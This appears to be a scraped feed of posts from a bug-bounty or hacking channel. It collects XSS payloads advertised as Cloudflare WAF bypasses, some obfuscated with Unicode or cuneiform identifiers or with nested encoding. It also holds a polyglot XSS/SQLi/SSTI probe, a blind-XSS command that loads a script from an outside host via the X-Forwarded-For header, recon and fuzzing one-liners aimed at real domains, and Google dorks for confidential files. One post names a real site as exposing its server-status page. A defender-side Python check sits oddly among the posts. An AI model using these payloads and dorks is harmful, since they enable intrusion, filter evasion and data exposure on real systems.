A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
❤25👍1
You can now passively enumerate all endpoints of a website with katana. (No need for waybackurls.)
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
👍11🔥6
When hunting for IDORs during a bug bounty program, consider the following tip:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.target.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.target.com/promo/offer/1234/details
Brute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
🔥14❤3👍3😁1
XSS Tip: If alert() is being converted to ALERT(), you can use something like:
onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
👍21🔥3❤2
Payload for XSS + SQLi + SSTI/CSTI !
'"><noscript/onload=prompt(5);>{{7*7}}
❤11👎2👍1
XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
🔥3❤2👍1
Blind XSS In X-Forwarded-For Header
subfinder -d http://target.com | gau | bxss -payload '"><noscript src=https://hacker.xss.ht></noscript>' -header "X-Forwarded-For"
👍3❤2
🫡Automate Your XSS
#!/bin/bash
read TARGET
subfinder -d $TARGET -silent | tee domains.txt
cat domains.txt | waybackurls | tee waybackurls.txt
cat waybackurls.txt | dalfox pipe
👍2
New XSS Bypass Cloudflare WAF 🧱
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
❤13
New Xss Fly Under Radar Cloudflare Bypass 🧱
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit -Halim
👍23
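A defender-side check for the two tricks visible in the payloads above (nested percent-encoding such as %25253d, and mixed-case handler names), added here as an example and not part of the original posts: it decodes a parameter until it stops changing, then matches event-handler attributes case-insensitively. The function names, the round limit and the nested sample are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

MAX_ROUNDS = 5  # assumption: a value still changing after 5 decodes is treated as hostile

# on<name>= preceded by whitespace, '/', or a quote; case-insensitive heuristic.
# It will also flag harmless attributes that merely start with "on".
HANDLER_RE = re.compile(r"""[\s/"'](on[a-z]+)\s*=""", re.IGNORECASE)

# Constructed sample in the same encoding style as the post above (not a quote from it).
SAMPLE_NESTED = '<input%252bTyPE%25253d"x"%252boNMoUseOVer%25253d"f()">'
# Payload quoted from the earlier "%3CSVG/oNlY=1" post on this page.
SAMPLE_SINGLE = "%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E"


def canonicalize(value, max_rounds=MAX_ROUNDS):
    """Form-decode ('+' and %XX) until a fixed point is reached.

    Returns (decoded, rounds, converged); converged is False when the
    value was still changing after max_rounds decodes.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(value)
        if decoded == value:
            return value, rounds, True
        value = decoded
        rounds += 1
    return value, rounds, unquote_plus(value) == value


def inspect_param(value):
    """Report decode depth and any event-handler attributes in the decoded form."""
    decoded, rounds, converged = canonicalize(value)
    handlers = sorted({m.group(1).lower() for m in HANDLER_RE.finditer(decoded)})
    return {
        "decode_rounds": rounds,
        "converged": converged,
        "handlers": handlers,
        # More than one decode round is itself a signal: browsers and normal
        # clients encode a parameter once.
        "suspicious": bool(handlers) or rounds > 1 or not converged,
    }


if __name__ == "__main__":
    for sample in (SAMPLE_SINGLE, SAMPLE_NESTED, "color=blue%20green"):
        print(sample[:40], inspect_param(sample))
```

A filter that decodes only once sees `%253d` in the nested sample and no `=` at all, which is why the match has to run on the fully decoded value.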
📢 An XSS payload, Cuneiform-alphabet based!
This payload was on trend back in 2020, but it still works :)
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()
(Cuneiform is a logo-syllabic script that was used to write several languages of the Ancient Near East. The script was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)
Source - Wikipedia
❤4👍1😁1
Google Dork - Sensitive Docs 📄
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:"confidential" | intext:"Not for Public Release" | intext:"internal use only" | intext:"do not distribute"
👍7🔥2
Google Dork - Server Errors ⚡
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
👍2
Google Dork - High % keywords 🚀
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
👍3
https://youtu.be/cfs5pWh5jqM?si=pEyqVQ6SctrnzI7C
DM For Live Class Enrollment
https://wa.me/918945971332
❤2👍1
Dork: Apache Server Leakage
Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Vulnerable Site- https://www.itronot.co.il/server-status
inurl:server-status "apache server status" "cpu usage"
❤3🔥1